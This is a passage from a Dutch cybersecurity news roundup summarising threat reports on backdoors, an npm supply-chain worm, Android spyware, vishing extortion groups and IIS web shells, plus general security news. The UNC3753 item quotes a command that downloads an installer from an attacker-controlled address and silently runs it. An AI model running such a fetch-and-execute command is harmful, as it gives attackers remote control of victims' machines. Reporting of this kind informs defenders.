Enkele dagen later keerden de aanvallers terug en herstelden ze de toegang tot de infrastructuur van het slachtoffer. Ze implementeerden toen de op maat gemaakte malware Plenet op een Synology NAS appliance. Plenet, door Google ook getraceerd als "Grimbolt", is een cross platform .NET gebaseerde backdoor die interactieve shell toegang, uitvoering van commando's op afstand, bestandsmanipulatie en het wisselen van command and control (C2) servers mogelijk maakt. De onderzoekers merken op dat Plenet qua ontwerp lijkt op Brickstorm, met gebruik van het WebSocket protocol voor C2 communicatie en een multiplexing bibliotheek voor gelijktijdige datastromen naar de server.
AgentPSD is een eenvoudig Python gebaseerde reverse shell utility. Volexity vermoedt dat VerdantBamboo deze gebruikte als een terugval mechanisme voor persistentie, mocht andere malware niet langer toegankelijk zijn. De onderzoekers ontdekten dat AgentPSD was geconfigureerd om verbinding te maken met een ander domein dan datgene dat Brickstorm gebruikte. De malware werd echter nooit ingezet, aangezien Brickstorm nog steeds actief was, wat de inschatting ondersteunt dat AgentPSD een secundair toegangsmechanisme was.
Tijdens het onderzoek probeerde Volexity de infrastructuur van VerdantBamboo te achterhalen. De onderzoekers ontwikkelden een fingerprint om IP adressen en domeinen te identificeren die Brickstorm gebruikte voor C2 communicatie. Hoewel meerdere machines werden geïdentificeerd, haalde de dreigingsactor de infrastructuur offline voordat de onderzoekers andere systemen konden onthullen. Tussen 18 en 23 september schakelden alle servers die eerder aan het patroon voldeden hun diensten op poort 443 uit. Rond diezelfde tijd publiceerde Google ook een nieuw rapport over de activiteit van Brickstorm, wat mogelijk suggereert dat de aanvaller op de hoogte was van het onderzoek naar hun operaties. Volexity omschrijft VerdantBamboo/UNC5221 als een "zeer geavanceerde dreigingsactor" die living off the land technieken en malware combineert en systemen aanvalt die niet direct... (tekst ingekort)
Bron: Volexity | Bron 2: learn.microsoft.com | Bron 3: github.com
06 juni 2026 | Miasma malware treft 32 Red Hat packages via gecompromitteerd account op GitHub
Op 1 juni 2026 hebben experts van meerdere cybersecuritybedrijven een omvangrijke supply chain compromittering ontdekt die softwarecomponenten van Red Hat treft. Beveiligingsfirma's Microsoft, Wiz Research, Snyk en Aikido rapporteerden dat aanvallers schadelijke code hebben geïnjecteerd in softwarepakketten onder de naam @redhat-cloud-services op npm, een openbare bibliotheek waar ontwikkelaars bouwstenen voor hun code vandaan halen.
De kwestie had gevolgen voor ten minste 32 pakketten, wat leidde tot 96 gecompromitteerde versies. Deze pakketten zijn essentieel voor het functioneren van de Red Hat Hybrid Cloud Console en worden wekelijks tussen de 80.000 en 117.000 keer gedownload. Gezien de brede integratie van deze modules, reikt de impact verder dan de infrastructuur van Red Hat zelf, tot externe ontwikkelpijplijnen.
De aanvallers maakten geen gebruik van wachtwoordraden of typosquatting. In plaats daarvan kregen zij toegang tot het persoonlijke GitHub-account van een legitieme Red Hat-medewerker. Via dit account hebben zij verborgen code wijzigingen (kwaadaardige "orphan commits") rechtstreeks in twee RedHatInsights repositories gepusht, zonder dat deze code werd beoordeeld.
Deze wijzigingen vonden plaats in twee golven van activiteit en introduceerden een minimaal GitHub Actions workflow. Dit workflow vroeg kortstondige OIDC identity tokens aan bij GitHub. Het systeem gebruikte deze tokens vervolgens om direct te authenticeren met npm's trusted publishing endpoint en de besmette pakketten te uploaden. Omdat de code afkomstig leek van een legitieme Red Hat-configuratie, werden de gecompromitteerde versies geleverd met geldige SLSA provenance attestations, waardoor ze authentiek leken voor beveiligingsscanners.
Onderzoekers hebben deze specifieke malwarevariant Miasma genoemd. Het opereert als een zelf-propagerende worm en credential stealer, gebaseerd op Mini Shai-Hulud. Dit is een open source malware framework dat eerder in 2026 werd gepubliceerd op BreachForums door de dreigingsgroep TeamPCP. De nieuwe versie van de malware vervangt oude ruimtevaartthema's door termen uit de Griekse mythologie, zoals Spartan.
Wanneer een ontwikkelaar een van deze besmette pakketten installeert, wordt automatisch een verborgen preinstall script geactiveerd voordat normale code wordt uitgevoerd. Dit script zoekt onmiddellijk naar gevoelige gegevens op de computer. Dit omvat cloud login keys voor Google Cloud, Microsoft Azure en Amazon Web Services, evenals SSH keys, wachtwoordgegevens en keys voor AI tools zoals Claude en Gemini. Daarnaast bevraagt de worm de npm registry voor andere pakketten die de geïnfecteerde identiteit mag wijzigen. Vervolgens publiceert het automatisch die pakketten opnieuw met dezelfde kwaadaardige payload, waardoor een enkele gecompromitteerde werkstation kan uitgroeien tot een vector om meer registries te infecteren.
De beheerders van de registry hebben de meeste kwaadaardige versies binnen enkele uren na de openbaarmaking ingetrokken, maar het onderzoek naar de supply chain voortgezet. Beveiligingsteams wordt geadviseerd om hun lockfiles te controleren, install scripts te blokkeren met de 'ignore-scripts' configuratie, en onmiddellijk alle cloud credentials of tokens te roteren die toegankelijk waren vanuit getroffen build environments.
Bron: Snyk | Bron 2: aikido.dev
06 juni 2026 | Nieuwe Android spyware 'Asin' richt zich op Arabischtalige gebruikers via valse apps
Onderzoekers van het Slowaakse cybersecuritybedrijf ESET hebben een nieuwe Android spyware ontdekt, genaamd Asin, die zich richt op Arabischtalige gebruikers. De malware wordt verspreid via diverse campagnes die sinds begin 2025 zijn waargenomen. Elke aanvalsgolf maakt gebruik van specifieke websites die legitieme apps, oorlogsgerelateerde updates en overheidsnieuwsbronnen nabootsen.
De websites die ESET heeft geïdentificeerd, zijn govlens[.]net, dat een overheidsnieuwsbron imiteert en op 27 mei 2025 is geregistreerd; pdf-reader[.]help, dat zich voordoet als een veilige PDF-editor en op 29 mei 2025 is geregistreerd; en live-war-map[.]com, dat updates over militaire incidenten belooft en op 20 januari 2025 is geregistreerd. Twee van deze websites, govlens[.]net en live-war-map[.]com, werden ook gepromoot via speciale accounts op sociale mediaplatforms zoals Facebook en Telegram, waaronder de Facebook-pagina www.facebook[.]com/GovLens.
Volgens ESET distribueert elk van deze websites een kwaadaardige app die legitieme functionaliteit combineert met heimelijke spywaremogelijkheden. Het cybersecuritybedrijf merkt op dat de naam van het Telegram-kanaal waarschijnlijk is geïnspireerd op Live Universal Awareness Map (Liveuamap), een legitiem en bekend platform dat zich richt op het in kaart brengen van lopende conflicten, mensenrechtenkwesties, natuurrampen en geopolitieke gebeurtenissen wereldwijd.
Meerdere artefacten die verband houden met Asin zijn inmiddels geïdentificeerd. Een daarvan werd in oktober 2025 vanuit Turkije geüpload naar VirusTotal. Een andere APK werd in december 2025 gedownload van het domein c-pdf[.]net door een gebruiker op een Xiaomi Redmi Note 13 Pro-apparaat met Android 15. Een derde sample, dat zich voordeed als "Syria Defense Map", werd rond half januari 2026 gedetecteerd op een Xiaomi Redmi Note 13 Pro+ 5G-apparaat met Android 15. In dit laatste geval werd de APK gedownload van de website syriadefensemap[.]com. Gebruikers moeten de app handmatig installeren en de benodigde machtigingen verlenen voordat de spyware zijn doelen kan realiseren.
De activiteit van de groep achter Asin is volgens ESET nog niet toegeschreven aan een specifieke actor en de primaire doelen van deze campagnes zijn onbekend. Echter, op basis van de gebruikte lokmiddelen wordt vermoed dat journalisten en OSINT (Open Source Intelligence)-onderzoekers in Arabischtalige regio's het doelwit kunnen zijn geweest. Drie van de vijf frauduleuze apps die ESET heeft ontdekt - GovLens, WarMap en Syria Defense Map - lijken voornamelijk bedoeld voor mensen die geïnteresseerd zijn in openbronnenonderzoek. Dit suggereert dat de activiteiten, in ieder geval gedeeltelijk, gericht waren op Arabischtalige journalisten of OSINT-professionals.
Bron: ESET | Bron 2: welivesecurity.com
06 juni 2026 | Mandiant waarschuwt voor geavanceerde datadiefstal en afpersing door UNC3753, inclusief fysieke infiltratie
De Google Threat Intelligence Group Mandiant heeft een financieel gemotiveerde campagne voor datadiefstal en afpersing blootgelegd, uitgevoerd door de dreigingscluster UNC3753, ook bekend onder de namen "Luna Moth", "Chatty Spider" en "Silent Ransom Group". Tussen januari en mei 2026 werden tientallen organisaties in de professionele, juridische en financiële dienstverlening in de Verenigde Staten het doelwit. Deze aanvallers maken gebruik van geavanceerde voice phishing (vishing) en sociale engineering technieken om toegang te verkrijgen tot bedrijfsomgevingen.
De campagne begint vaak met goedaardige, factuur gerelateerde e-mails die geen kwaadaardige links of bijlagen bevatten. Het primaire doel van deze e-mails is het creëren van een voorwendsel en het wekken van interne beveiligingsbezwaren bij het doelwit, waardoor zij ontvankelijker worden voor daaropvolgende telefoongesprekken.
UNC3753 voert vervolgens gerichte vishing aanvallen uit. De actoren doen zich voor als IT ondersteuning of leden van het interne beveiligingsteam en benaderen medewerkers van alle niveaus, vaak personen wier contactgegevens openbaar op de website van de organisatie staan vermeld. Onder het mom van het oplossen van een beveiligingsprobleem of het ondersteunen van een datamigratieproject, bouwen de aanvallers vertrouwen op en overtuigen zij het slachtoffer om deel te nemen aan een schermdeel sessie en Remote Monitoring and Management (RMM) tools te downloaden.
Eenmaal binnen de omgeving zoeken de dreigingsactoren direct naar en exfiltreren zij gevoelige gegevens, of manipuleren zij het slachtoffer om deze acties namens hen uit te voeren. De gestolen data omvat doorgaans bedrijfseigen juridische overeenkomsten, persoonlijk identificeerbare informatie (PII) en financiële gegevens, die vervolgens worden gebruikt voor afpersingsdoeleinden.
Een bijzonder zorgwekkend aspect van deze campagne is dat in sommige gevallen, mogelijk gelinkt aan UNC3753, de dreigingsactoren fysiek toegang hebben verkregen tot systemen van slachtoffers. Personen die zich voordeden als IT technici betraden bedrijfskantoren om direct data van endpoints te exfiltreren met behulp van USB opslagmedia.
Het operationele model van UNC3753 kenmerkt zich door een hoge snelheid. In veel onderzochte incidenten vond de gehele aanvalssequentie - van initieel contact tot datadiefstal en afpersing - plaats binnen één werkdag. Mandiant heeft recentelijk waargenomen dat het zoeken naar data, het klaarzetten en de diefstal al in minder dan een uur werden geïnitieerd.
Voor schermdeel sessies maken de aanvallers gebruik van legitieme diensten zoals Zoom, Microsoft Terminal Services, Microsoft Teams en Quick Assist. Voor meer persistente toegang proberen zij slachtoffers te overtuigen om RMM agents zoals AnyDesk, Bomgar of Zoho Assist te installeren. In één geval werd geprobeerd een "SuperOps RMM agent" te installeren via een cURL commando, zoals: `curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet`. De communicatie van installatielinks en commando's gebeurt consistent via privnote[.]com, een web gebaseerde, zelfvernietigende tekst utility, om sporen op endpoints te vermijden.
Bron: Mandiant | Bron 2: virustotal.com
06 juni 2026 | Wachtwoordkluis klanten Dashlane gestolen na bruteforce aanval
Wachtwoordmanager Dashlane heeft meer details vrijgegeven over een recente bruteforce aanval waarbij de wachtwoordkluis van een klein aantal klanten werd gestolen. De aanvallers richtten zich op de API endpoints die Dashlane gebruikt voor de registratie van nieuwe apparaten.
Gebruikers van Dashlane kunnen extra apparaten, zoals telefoons of computers, aan hun account toevoegen. Voor de verificatie van de identiteit van de accounthouder stuurt Dashlane een zescijferig token naar het e-mailadres van de gebruiker. Indien tweefactorauthenticatie (2FA) is ingeschakeld, moet de gebruiker een code genereren via een authenticatie app. De ontvangen of gegenereerde code wordt vervolgens in de Dashlane app ingevoerd. Na succesvolle verificatie registreert Dashlane het nieuwe apparaat en downloadt een kopie van de online wachtwoordkluis naar het zojuist toegevoegde apparaat.
Bij de bruteforce aanval verstuurden de aanvallers een groot aantal geautomatiseerde requests naar de API endpoints voor apparaatregistratie. Voordat de aanval volledig kon worden gestopt, slaagden de aanvallers erin om geldige tokens te bruteforcen en te genereren voor minder dan twintig gebruikers. Dit stelde de aanvallers in staat om een nieuw apparaat aan het account van deze gebruikers toe te voegen, waarna de versleutelde wachtwoordkluis op het apparaat van de aanvaller werd gedownload.
Dashlane benadrukt dat de gestolen wachtwoordkluizen versleuteld zijn. Om toegang te krijgen tot de inhoud, moeten de aanvallers het master password van de betreffende accounts kraken. De wachtwoordmanager heeft aangekondigd extra verificatiemaatregelen te zullen invoeren voor het toevoegen van nieuwe apparaten om dergelijke aanvallen in de toekomst te voorkomen.
Bron: Dashlane
06 juni 2026 | Nieuwe dreigingsgroep OP-512 richt zich op Microsoft IIS servers
Cybersecurityonderzoekers hebben een voorheen onbekende dreigingsgroep genaamd OP-512 (waarbij "OP" staat voor "opponent") ontdekt, die zich richt op Microsoft Internet Information Services (IIS) servers om een op maat gemaakt web shell framework te implementeren. ReliaQuest schat met matig tot hoog vertrouwen in dat deze spionagegerichte activiteit gerelateerd is aan China.
Volgens een rapport van ReliaQuest voerde OP-512 hoogstwaarschijnlijk spionage uit via een gecompromitteerde IIS-webserver bij een organisatie waarvan de sector en geografie overeenkomen met de inlichtingenprioriteiten van China. Hoewel er geen overlappingen zijn gevonden tussen OP-512 en andere bekende Chinese adversarials, is het de vierde dergelijke dreigingsgroep - na CL-STA-0048, DragonRank en GhostRedirector - die zich de afgelopen twaalf maanden specifiek richt op IIS-webservers. Vorige maand onthulde Cisco Talos nog dat meerdere Chinese cybercrimegroepen een variant van malware genaamd BadIIS delen om IIS-servers te infecteren. Ook SHADOW-EARTH-053 heeft zich gericht op IIS-servers als onderdeel van een spionagecampagne die overheids- en defensiesectoren in Zuid-, Oost- en Zuidoost-Azië trof.
De kern van de operaties van OP-512 is een op maat gemaakt web shell framework, bestaande uit drie web shells. Deze geven de aanvallers toegang op afstand tot de gecompromitteerde host, terwijl stappen worden ondernomen om op handtekeningen gebaseerde detectie te omzeilen. Ze bemoeilijken forensische tijdlijnen door technieken zoals timestomping te gebruiken, waarbij de tijdstempels van web shell artefacten opzettelijk worden gemanipuleerd. Dit houdt concreet in dat alle bestanden en submappen rondom de geplaatste web shells worden gescand, de mediane 'laatst gewijzigd'-tijdstempel wordt berekend, en de eigen aanmaak- en wijzigingstijden worden overschreven om overeen te komen met deze waarde. Dit geeft de indruk dat de web shells al langere tijd aanwezig zijn op het systeem.
ReliaQuest merkte op dat dit framework capaciteiten combineert die zelden samen worden gezien. Elke implementatie wordt uniek gegenereerd, toegang is beperkt tot de aanvaller via cryptografische controles, en gecompromitteerde servers rapporteren automatisch terug voor gecentraliseerd beheer op schaal.
OP-512 vertoont tactische gelijkenis met CL-STA-0048, wat de mogelijkheid doet rijzen dat het een bestaande groep betreft die zijn toolset volledig heeft vernieuwd, of dat het deze capaciteiten onafhankelijk heeft ontwikkeld. Ongeacht de oorsprong wordt de hackinggroep beschouwd als een afzonderlijke cluster die autonoom opereert.
Bij de door het cybersecuritybedrijf geobserveerde aanval bleek de dreigingsactor zich te richten op een oudere IIS-server die draaide op Windows Server 2016 met het end-of-life .NET Framework 4.0. Er was bewijs van eerdere activiteit op dezelfde host, ongeveer 75 dagen voordat het hoofincident plaatsvond. Dit omvatte DNS-query's naar een ander, door de aanvaller gecontroleerd domein ("ashx.lhlsjcb[.]com").
De reeks acties die weken later volgde, wordt beschreven als een "sprint", waarbij de aanvaller het worker-proces van de webserver ("w3wp.exe") gebruikte om een van de web shells in de uploadmap van de applicatie te plaatsen. Dit activeerde op zijn beurt een zelfrapporterend mechanisme dat een DNS-query of een HTTP-verzoek als fallback gebruikt om de locatie van de web shell naar een door de aanvaller gecontroleerd domein te verzenden. De onderzoekers van ReliaQuest legden uit dat de drie web shells de aanvaller gezamenlijk bestandsbeheer, geauthenticeerde command-uitvoering via twee onafhankelijke toegangspaden, en geautomatiseerde rapportage van de compromittering gaven, nog voordat iemand tijd had om te reageren.
Nadat de web shells waren geïmplementeerd, heeft OP-512 geprobeerd privileges te escaleren naar het SYSTEM-niveau met behulp van de Potato Suite. Vervolgens werden commando's zoals "whoami /priv" uitgevoerd om de systeemrechten te bevestigen. ReliaQuest stelt dat vier aan China gerelateerde clusters die dezelfde technologie in minder dan een jaar tijd aanvallen, waarschijnlijk geen toeval is. Internet-gerichte IIS-servers die verouderde, niet-ondersteunde software draaien, blijven een voorkeurstoegangspunt binnen dit dreigingsecosysteem en vertonen geen tekenen van vertraging. Het meest zorgwekkende aan OP-512 is dat deze dreigingsgroep geen standaard tools gebruikt, maar een speciaal gebouwd framework dat is ontworpen om de detectiemethoden te omzeilen die effectief zijn tegen de andere drie clusters. Organisaties die hun verdediging hebben afgestemd op bekende actoren, zijn hier waarschijnlijk niet tegen gedekt.
Bron: ReliaQuest
07 juni 2026 | Nieuwe 'Pink' groep steelt Microsoft 365 cloud data via vishing
Een nieuwe cybercrime groep, genaamd Pink, richt zich op bedrijfsdata voor financiële afpersing. De onderzoekstak van Palo Alto Networks, Unit 42, heeft deze dreiging als eerste blootgelegd. De groep wordt vermoedelijk gelinkt aan het bredere Com netwerk en door de onderzoekers gevolgd onder de cluster code CL-CRI-1147. Op 31 mei 2026 lanceerde Pink een speciale data lek site, waarop de namen van diverse eerste slachtoffers verschenen. Voortbouwend op de data van Unit 42, publiceerde beveiligingsanalysebedrijf Gurucul op 4 juni 2026 een aanvullende analyse om bedrijven te helpen de sporen van de groep binnen bedrijfsnetwerken te detecteren.
Uit onderzoek van Unit 42 blijkt dat Pink traditionele malware payloads vermijdt. In plaats daarvan vertrouwen de dreigingsactoren op voice phishing, of vishing, om zakelijke gebruikers te targeten. Door zich telefonisch voor te doen als interne ICT-medewerkers, manipuleren de hackers werknemers om frauduleuze inlogpagina's te bezoeken, zoals passkeyadd.com of passkeydeploy.com.
Wanneer een werknemer in de val trapt en zijn gegevens invoert, stelen de hackers de actieve inlogsessie. Dit stelt hen in staat om de meervoudige authenticatie te omzeilen. Vervolgens krijgen zij toegang tot het Microsoft 365 systeem van het bedrijf en gebruiken zij de eigen geautomatiseerde tools van Microsoft om cloud opslag te doorzoeken. Binnen enkele minuten worden gevoelige bestanden uit OneDrive en SharePoint mappen gehaald.
Zodra de data is veiliggesteld, begint de afpersing. Pink gebruikt de gecompromitteerde werknemersaccounts om e-mails naar collega's te sturen en interne Microsoft Teams berichten te verzenden, waarin betaling wordt geëist. Bestuurders krijgen een strakke deadline van 72 uur om te reageren.
Na de openbaarmaking door Unit 42 analyseerde Gurucul hoe Pink na de initiële toegang opereert op lokale werkstations. In een advies dat op 4 juni 2026 werd gepubliceerd, merkte Gurucul op dat Pink bestandsloze methoden gebruikt om verborgen te blijven. In plaats van een omvangrijk, opvallend virus op een harde schijf te downloaden, implementeren de hackers kleine code commando's die zich verbergen in legitieme systeempaden. De software bouwt zijn hoofdcode direct op in de tijdelijke geheugencache van de computer, waardoor deze volledig onzichtbaar is voor standaard antivirus mapscanners. Gurucul ontdekte ook dat de code eerst de computeromgeving controleert; als het een sandbox of een analyse laboratorium van beveiligingsteams detecteert, verbergt het zijn gedrag.
Omdat Pink legitieme cloud tools en authentieke accounttoegang gebruikt, hebben standaard firewalls moeite om de dreiging te detecteren. Experts adviseren werknemers te trainen om onverwachte telefoontjes van de ICT-afdeling onafhankelijk te verifiëren. Degenen die verantwoordelijk zijn voor netwerkbeveiliging moeten ook zoeken naar ongebruikelijke geautomatiseerde scripts in hun logs, de bekende webdomeinen van de groep blokkeren en gedragsmonitoring gebruiken om massale, plotselinge bestand downloads te onderscheppen voordat de data het bedrijf verlaat.
Bron: Palo Alto Networks' Unit 42 | Bron 2: github.com | Bron 3: gurucul.com
Algemeen
6.0 Algemeen:
02 juni 2026 | Nederlandse digitale ID-wallet vereist Apple- of Google account
De overheidswallet die de Nederlandse overheid momenteel ontwikkelt voor de Europese digitale identiteit (EDI) vereist een account van Apple of Google. Dit is gemeld door Follow the Money. Hoewel de overheid aangeeft dat er wordt gekeken naar ondersteuning voor gebruikers van andere ecosystemen, zijn de ecosystemen van Apple en Google om veiligheidsredenen als eerste geïmplementeerd.
De Europese Commissie introduceerde in 2021 plannen voor de invoering van een digitale identiteit, waarmee burgers zich binnen de gehele Europese Unie kunnen identificeren. Via een speciale wallet-app voor smartphones en andere apparaten moeten burgers zich kunnen identificeren en elektronische documenten delen. Grote platformen zullen in de toekomst verplicht worden deze nieuwe Europese digitale identiteit te accepteren.
De afgelopen maanden is er onder andere op Hacker News alarm geslagen over het feit dat de wallet-apps die de EU-landen ontwikkelen een Apple- of Google account vereisen. Dit geldt ook voor de NL Wallet, de app waar de Nederlandse overheid aan werkt. Een woordvoerder van staatssecretaris Aerdts voor Digitale Economie verklaarde dat de keuze voor de software van Google en Apple is gemaakt vanwege veiligheidsredenen. Deze platformen bieden ondersteuning en bescherming aan een grote gebruikersgroep en zijn daarom als eerste geïmplementeerd. De autoriteiten hebben tegenover Follow the Money bevestigd dat voor de grootste gebruikersgroepen, die gebruikmaken van deze ecosystemen, op dit moment een veilige oplossing is gerealiseerd. Wel wordt de mogelijkheid onderzocht om gebruikers van andere ecosystemen te ondersteunen, mits deze opties veilig blijken te zijn. De Europese Commissie streeft ernaar dat alle EU-lidstaten voor het einde van dit jaar een werkende wallet-app hebben, een deadline die waarschijnlijk door geen enkel land gehaald zal worden.
De overheid heeft herhaaldelijk benadrukt dat het gebruik van de wallet-app altijd vrijwillig zal zijn en dat deze DigiD niet zal vervangen. Jaap-Henk Hoepman, privacy-expert en universitair hoofddocent digital security aan de Radboud Universiteit in Nijmegen, noemt deze ontkenning "maf". Hij stelt dat het aanbieden van beide apps extra kosten met zich meebrengt voor instanties zoals de Belastingdienst, gemeenten en zorginstellingen. Daarnaast vraagt hij zich af waarom mensen zouden overstappen naar de nieuwe wallet als DigiD beschikbaar blijft.
Bron: MinBZK | Bron 2: github.com
02 juni 2026 | Mismanagement lamlegt cruciale NIST National Vulnerability Database
Een cruciaal databank voor kwetsbaarheden in cybersecurity, beheerd door het Amerikaanse National Institute of Standards and Technology (NIST), is ernstig verzwakt door wanbeheer en strategische tekortkomingen. Dit heeft geleid tot een extreme achterstand in de verwerking van kwetsbaarheden, zo blijkt uit een recent intern rapport van de inspecteur-generaal van het Department of Commerce. De National Vulnerability Database (NVD) van NIST, een essentieel hulpmiddel voor zowel de industrie als overheidsinstanties om kwetsbaarheden in cybersecurity te prioriteren, zag de achterstand oplopen van 13.000 onverwerkte kwetsbaarheden in februari 2024 tot meer dan 27.000 eind 2025. Dit ondermijnt de bruikbaarheid van de NVD en het publieke vertrouwen, aldus het rapport.
De verslechterende achterstand ontstond in februari 2024, toen NIST stopte met het betalen van de contractanten die de beveiligingslekken verwerken. Slechte planning door NIST leidde tot de huidige situatie. NIST had beloofd het probleem tegen september 2024 op te lossen, maar slaagde er niet in het doel van ongeveer 6.200 verwerkte kwetsbaarheden per maand te halen. Historisch verwerkte het agentschap nooit meer dan 5.000 kwetsbaarheden per maand en erkende het geen plan te hebben om het gestelde doel te bereiken.
Het rapport stelt dat NIST geen duurzame processen heeft om inzendingen voor de NVD te beheren en de achterstand niet kan wegwerken zonder significante veranderingen. Naast zwakke strategische planning, verzuimde NIST te communiceren met het Cybersecurity and Infrastructure Security Agency (CISA). Dit leidde tot dubbel werk in minstens 21.000 gevallen tussen mei 2024 en december 2025. CISA lanceerde in mei 2024 zijn eigen Vulnrichment-programma, maar NIST coördineerde niet met CISA nadat het programma van de NVD zijn contractanten opnieuw had ingehuurd. De twee instanties huurden zelfs dezelfde contractant in voor identiek werk, wat resulteerde in ongeveer 200.000 dollar verspilling sinds mei 2024. Dit gebrek aan communicatie heeft stakeholders gefrustreerd en het vertrouwen in de NVD verminderd.
De inspecteur-generaal beveelt aan dat NIST efficiënter wordt bij het toekennen van ernstscores en het labelen van getroffen producten. NIST kan de komende twee jaar ongeveer 800.000 dollar besparen door minder tijd te besteden aan het scoren. Tachtig procent van de inzendingen bevat al ernstscores, en de scores van NIST komen slechts in 12 procent van de gevallen overeen met die van onafhankelijke beoordelaars. Verder heeft het agentschap nagelaten effectief te communiceren met stakeholders, wat bleek uit een open brief van 50 cybersecurityprofessionals in april 2024, waarop geen reactie kwam. De brief onderstreepte de "gebrek aan transparante communicatie" over de "terugval in de operaties van de NVD".
NIST moet een plan opstellen om de NVD te herstellen, efficiënter communiceren, minder tijd besteden aan ernstscores en samenwerken met CISA om dubbel werk te voorkomen. Het agentschap heeft ingestemd met de aanbevelingen en zal onmiddellijk beginnen met verbeteringen, zo blijkt uit een brief van april van waarnemend directeur van NIST, Craig Burkhardt. Michael Daniel, president en CEO van de Cyber Threat Alliance, suggereert zelfs dat NIST de verantwoordelijkheid voor de NVD aan CISA zou moeten overdragen, gezien de "significante middelen tekorten" bij NIST en omdat het runnen van een dergelijk operationeel programma beter past bij de missie van CISA.
Bron: Office of Inspector General, Department of Commerce | Bron 2: oig.doc.gov | Bron 3: cyberscoop.com
02 juni 2026 | Microsoft wijzigt standpunt over publicatie zero-days na kritiek
Microsoft heeft maandag aangegeven "geen intentie te hebben om actie te ondernemen" tegen beveiligingsonderzoekers die kwetsbaarheden ontdekken en hun bevindingen publiceren. Deze verklaring volgt op een eerdere officiële blogpost die dagen daarvoor een golf van kritiek teweegbracht binnen de beveiligingsgemeenschap. De oorspronkelijke post had een recente reeks ongecoördineerde publicaties van Windows zero-days veroordeeld als "nooit gerechtvaardigd" en stelde dat de Digital Crimes Unit van het bedrijf "zaken zou blijven aanspannen tegen" degenen die criminele actoren in staat stellen schade te berokkenen.
Hoewel Microsoft de pseudonieme onderzoeker Nightmare Eclipse, verantwoordelijk voor de onthullingen, niet expliciet bij naam noemde of direct bedreigde, werden de publicaties wel omschreven als het creëren van "onnodig risico". De woordkeuze van Microsoft werd door velen opgevat als een dreigement. Dit leidde tot kritiek vanuit de beveiligingsgemeenschap, waarbij veel onderzoekers sympathie toonden voor de grieven van Nightmare Eclipse tegen Microsoft. De onderzoeker beweerde onder meer dat het bedrijf hun Microsoft Security Response Center account had verwijderd, bounty-betalingen had achtergehouden en hun attributie had verwijderd uit ten minste één advies.
In de nieuwe verklaring, die via sociale media werd gedeeld in plaats van via de officiële blog, gaf Microsoft aan de feedback serieus te nemen. Het bedrijf verduidelijkte: "Om duidelijk te zijn over onze benadering van juridische zaken, hebben we geen intentie om actie te ondernemen tegen individuen die beveiligingsonderzoek uitvoeren of publiceren." Hieraan werd de kanttekening toegevoegd: "Wanneer een individu de wet overtreedt en zich bezighoudt met kwaadaardige activiteiten die reële schade toebrengen aan onze klanten, zullen we waar nodig samenwerken met wetshandhaving."
Microsoft erkende tekortkomingen in de omgang met relaties met onderzoekers, door te stellen dat "sommige interacties tekort zijn geschoten" en dat het bedrijf "leert" van deze incidenten. De verklaring ging niet direct in op de specifieke aantijgingen van Nightmare Eclipse. Ook liet de nieuwe verklaring de term "responsible disclosure" vallen, die vier keer voorkwam in de oorspronkelijke post. Microsoft verwijst nu in plaats daarvan naar "Coordinated Vulnerability Disclosure", een term die het bedrijf in 2010 adopteerde om de implicatie te vermijden dat onderzoekers die niet voldoen aan de regels zich onverantwoordelijk gedragen. Katie Moussouris, die als Microsoft-medewerker hielp om de eerdere term buiten gebruik te stellen, had het opnieuw verschijnen ervan in de eerdere post als "beladen" bestempeld.
Microsoft benadrukte verder: "De beveiligingsgemeenschap speelt een vitale rol in het helpen beschermen van klanten. We zijn toegewijd aan het onderhouden van een constructieve en respectvolle relatie en om samen te groeien. We weten dat er, gezien de aard van dit werk, soms misverstanden zullen ontstaan. We blijven toegewijd aan te goeder trouw te handelen en een respectvolle en professionele ervaring te bieden aan alle onderzoekers, ongeacht eerdere interacties."
In een blogpost gaf Nightmare Eclipse aan dat na "recente gebeurtenissen" andere onderzoekers hen hadden benaderd en in sommige gevallen kwetsbaarheden direct hadden aangeleverd. De onderzoeker kondigde aan dat een nieuwe Secure kwetsbaarheid in Boot ergens in juni zal worden gepubliceerd. Deze bug "omzeilt BitLocker volledig" en kan mogelijk worden gebruikt om vertrouwelijke virtuele machines te compromitteren. Een woordvoerder van Microsoft verklaarde na de publicatie dat het bedrijf geen MSRC-onderzoekersportaalaccounts verwijdert en kon niet bevestigen welk account de persoon claimt dat is gedeactiveerd.
Bron: Microsoft | Bron 2: recordedfuture.com
02 juni 2026 | Have I Been Pwned registreert duizendste datalek en uit kritiek op bedrijven
De website Have I Been Pwned (HIBP), opgericht door Troy Hunt, heeft een belangrijke mijlpaal bereikt door het duizendste datalek te registreren. Sinds de lancering eind 2013 is de website uitgegroeid tot een essentiële bron voor internetgebruikers die willen controleren of hun e-mailadres is betrokken bij een van de vele datalekken die wereldwijd plaatsvinden. De databases van HIBP bevatten inmiddels gegevens van 17,5 miljard gecompromitteerde accounts, afkomstig van duizend verschillende gehackte websites.
Onder de grootste datalekken die HIBP heeft vastgesteld, bevinden zich incidenten bij Facebook, MySpace, Wattpad, NetEase, Deezer en Twitter. Bij elk van deze diensten werden gegevens van meer dan tweehonderd miljoen accounts buitgemaakt, met Facebook als uitschieter met bijna 510 miljoen gestolen accounts. Het duizendste geregistreerde datalek betreft het "car-shopping platform" Edmunds, waarbij de criminele groepering ShinyHunters verantwoordelijk was voor het stelen van gegevens van 178.000 personen.
Oprichter Troy Hunt uit echter ook zijn zorgen over een groeiende trend: bedrijven nemen steeds langer de tijd om slachtoffers van datalekken te informeren. Bedrijven rechtvaardigen dit vaak door aan te geven dat ze eerst de aard en omvang van de gestolen data grondig willen vaststellen. Hunt bekritiseert deze houding, omdat het impliceert dat een vroege waarschuwing niet kan worden verstuurd voordat de volledige impact duidelijk is, iets wat volgens hem relatief eenvoudig te realiseren zou moeten zijn voor een organisatie.
Hunt vermoedt dat bedrijven het uitstellen van de bekendmaking van een datalek bewust doen om class action rechtszaken te voorkomen. Hij benadrukt dat deze aanpak niet primair gericht is op het beschermen van de klant, maar eerder op het afschermen van de organisatie zelf, gezien de verantwoordelijkheid van bedrijven jegens hun aandeelhouders.
Bron: Have I Been Pwned | Bron 2: troyhunt.com
02 juni 2026 | Detectie van cyberaanvallen even cruciaal als preventie, pentesten bieden inzicht
De uitspraak van voormalig FBI Director Robert Mueller, dat er twee soorten bedrijven zijn – zij die gehackt zijn en zij die nog gehackt zullen worden – blijft onverminderd relevant. Toch onderschatten veel organisaties hun kwetsbaarheid. Pentesten bieden een effectieve methode om zwakke plekken snel te identificeren.
